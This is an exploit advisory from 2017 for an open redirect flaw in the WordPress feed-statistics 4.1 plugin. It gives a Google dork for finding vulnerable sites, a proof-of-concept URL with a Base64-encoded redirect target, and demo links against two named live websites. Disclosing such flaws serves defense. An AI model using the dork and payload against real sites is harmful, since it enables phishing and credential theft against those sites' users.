WordPress Feed-Statistics 4.1 Open Redirect
Posted on 21 December 2017
[+] Title: WordPress feed-statistics Plugin Open Redirect Vulnerability [+] Date: 2017-12-20 [+] Author: Mostafa Gharzi [+] Vendor Homepage: www.WordPress.org [+] Tested on: Windows 10 & Kali Linux [+] Vulnerable File: /feed-statistics.php?url= [+] Vulnerable Parameter: Get Method [+} Dork : inurl:/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url= ### Notes: Unvalidated Redirects vulnerability in feed-statistics Plugin of WordPress , allows when application accepts untrusted input that could cause the web application to redirect the request to a URL contained within an untrusted input. By modifying untrusted URLs into a malicious site, an attacker can successfully launch a phishing and steal user credentials. ### URL Encoded by Base64: [+] Example: https://www.google.com/ ==> Base64 Algorithm ==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= ### POC: [+} http://Site/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=[URL Encoded by Base64] ### Demo: [+] http://blog.caplin.com/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= [+] http://fabianferber.de/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= ### Special Thanks: [+] CertCC.ir [+] Gucert.ir
